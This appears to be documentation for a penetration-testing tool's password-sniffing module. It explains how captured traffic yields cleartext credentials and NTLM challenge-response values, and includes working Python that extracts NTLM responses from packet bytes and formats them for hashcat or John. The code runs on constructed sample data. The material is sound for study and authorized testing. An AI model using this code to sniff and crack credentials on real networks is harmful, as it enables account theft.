Sniffing Password Hashes from the Network

Usernames, passwords and password hashes can sometimes be obtained by sniffing network traffic: cleartext protocols expose credentials directly, and challenge-response authentication such as NTLM exposes values that can be attacked offline. To sniff the network for passwords, use the "Password Sniffer" module from the root of the Information Gathering folder in the Modules Panel. This module requires an agent with packet capture capabilities: the localagent, or any agent running the Pcap plugin with root/administrator privileges.

To start looking for passwords by capturing packets, do the following:

  1. Start by selecting an appropriate agent. As noted above, the agent must be able to capture packets from the network. The host running the agent must also sit at a point in the network where sniffing is useful, since a host only sees packets that traverse its own network segment. Keep in mind that on a switched network a switch delivers unicast frames only to the port of their destination, so a host on the segment does not see every packet: in practice it sees broadcast and multicast traffic and traffic to and from itself, unless its switch port is configured as a mirror (SPAN) port or the host lies in the traffic path (for example, acting as a gateway).
  2. Launch the Password Sniffer module from the Information Gathering folder. The module runs continuously, capturing authentication-related packets and extracting usernames, passwords or hashes whenever it can. Anything found is stored in the Entity Database.

Captured cleartext usernames and passwords are stored in the Entity Database and can be reused as they are. Captured NTLM hashes are challenge-response values rather than reusable secrets, so they need to be cracked; they can be exported to a password cracker. This procedure is described in the following section.
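As an added example (not code from the original documentation or from the product it describes), the following Python shows the extraction step a sniffer performs for NTLM: locate NTLMSSP messages in captured payload bytes, take the server challenge from the CHALLENGE message and the user, domain and response from the AUTHENTICATE message, and emit the pair in the format password crackers accept. All messages, the server challenge, the NTProofStr and the blob are constructed values (the NTProofStr is not a real HMAC), and the single-flow pairing is an assumption; the example also handles the 24-byte NTLMv1 response form, which the text above does not discuss.

```python
"""Pull NTLM challenge/response pairs out of captured payload bytes and emit
them in password-cracker format (NetNTLMv2: hashcat -m 5600 / John
"netntlmv2"; NetNTLMv1: hashcat -m 5500 / John "netntlm").

Added example, not code from the original documentation or the product it
describes. The input is a constructed byte stream; on a real capture the
payload would be carved from SMB, HTTP ("Authorization: NTLM <base64>"),
LDAP or MSSQL traffic."""
import struct

NTLMSSP = b"NTLMSSP\x00"
NEGOTIATE_UNICODE = 0x00000001  # strings in the message are UTF-16LE


def _layout(header_len, parts):
    """Build NTLM 'security buffers' (len, maxlen, offset) for payload parts
    placed directly after a fixed-size header; returns (fields, payload)."""
    fields, payload, off = b"", b"", header_len
    for part in parts:
        fields += struct.pack("<HHI", len(part), len(part), off)
        payload += part
        off += len(part)
    return fields, payload


def build_challenge(server_challenge, target_name="CORP"):
    """Constructed Type 2 (CHALLENGE) message; fixed header is 48 bytes."""
    fields, payload = _layout(48, [target_name.encode("utf-16-le"), b""])
    return (NTLMSSP + struct.pack("<I", 2) + fields[:8]
            + struct.pack("<I", NEGOTIATE_UNICODE) + server_challenge
            + b"\x00" * 8 + fields[8:] + payload)


def build_authenticate(user, domain, workstation, lm_resp, nt_resp):
    """Constructed Type 3 (AUTHENTICATE) message; fixed header is 64 bytes."""
    u16 = lambda s: s.encode("utf-16-le")
    parts = [lm_resp, nt_resp, u16(domain), u16(user), u16(workstation), b""]
    fields, payload = _layout(64, parts)
    return (NTLMSSP + struct.pack("<I", 3) + fields
            + struct.pack("<I", NEGOTIATE_UNICODE) + payload)


def _buf(msg, field_off):
    """Read a security buffer descriptor and return the bytes it points to."""
    length, _maxlen, offset = struct.unpack_from("<HHI", msg, field_off)
    return msg[offset:offset + length]


def parse_challenge(msg):
    """Type 2: the 8-byte ServerChallenge sits at fixed offset 24."""
    return msg[24:32]


def parse_authenticate(msg):
    """Type 3: the fields a cracker needs. Strings are UTF-16LE when the
    UNICODE flag (NegotiateFlags at offset 60) is set, OEM otherwise."""
    flags = struct.unpack_from("<I", msg, 60)[0]
    enc = "utf-16-le" if flags & NEGOTIATE_UNICODE else "latin-1"
    return {"lm_response": _buf(msg, 12), "nt_response": _buf(msg, 20),
            "domain": _buf(msg, 28).decode(enc), "user": _buf(msg, 36).decode(enc),
            "workstation": _buf(msg, 44).decode(enc)}


def to_cracker_format(server_challenge, auth):
    nt = auth["nt_response"]
    if len(nt) > 24:  # NTLMv2: NtChallengeResponse = NTProofStr (16) || blob
        return "{}::{}:{}:{}:{}".format(auth["user"], auth["domain"],
                                        server_challenge.hex(), nt[:16].hex(), nt[16:].hex())
    # NTLMv1: 24-byte LM and NT responses, server challenge last
    return "{}::{}:{}:{}:{}".format(auth["user"], auth["domain"],
                                    auth["lm_response"].hex(), nt.hex(), server_challenge.hex())


def extract_hashes(stream):
    """Scan a byte stream for NTLMSSP messages and pair each AUTHENTICATE with
    the most recent CHALLENGE before it. A real sniffer keys the pairing on
    the TCP connection; a single flow is assumed here."""
    hashes, challenge, pos = [], None, 0
    while (pos := stream.find(NTLMSSP, pos)) >= 0 and len(stream) - pos >= 12:
        msg = stream[pos:]
        msg_type = struct.unpack_from("<I", msg, 8)[0]
        if msg_type == 2:
            challenge = parse_challenge(msg)
        elif msg_type == 3 and challenge is not None:
            hashes.append(to_cracker_format(challenge, parse_authenticate(msg)))
            challenge = None  # a server challenge is single use
        pos += len(NTLMSSP)
    return hashes


# Constructed sample data: not a real capture.
SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")
SAMPLE_PROOF = bytes(range(16))  # stands in for NTProofStr (not a real HMAC)
# Blob: RespType/HiRespType, reserved, timestamp, client challenge, reserved,
# empty AV_PAIR list (MsvAvEOL), reserved.
SAMPLE_BLOB = (b"\x01\x01" + b"\x00" * 6 + b"\x00" * 8 + b"\x11" * 8
               + b"\x00" * 4 + b"\x00" * 4 + b"\x00" * 4)
SAMPLE_STREAM = (b"\xffSMB\x00\x00filler"  # unrelated bytes ahead of the messages
                 + build_challenge(SERVER_CHALLENGE) + b"\x00" * 5
                 + build_authenticate("jsmith", "CORP", "WS01", b"\x00" * 24,
                                      SAMPLE_PROOF + SAMPLE_BLOB))

if __name__ == "__main__":
    for line in extract_hashes(SAMPLE_STREAM):
        print(line)  # feed to hashcat -m 5600 or john --format=netntlmv2
```

The output line has the shape `user::domain:serverchallenge:NTProofStr:blob`; the cracker recomputes NTProofStr = HMAC-MD5(NTLMv2 key, challenge || blob) for each candidate password, which is why the blob has to be exported whole and why a sniffed challenge-response cannot simply be replayed.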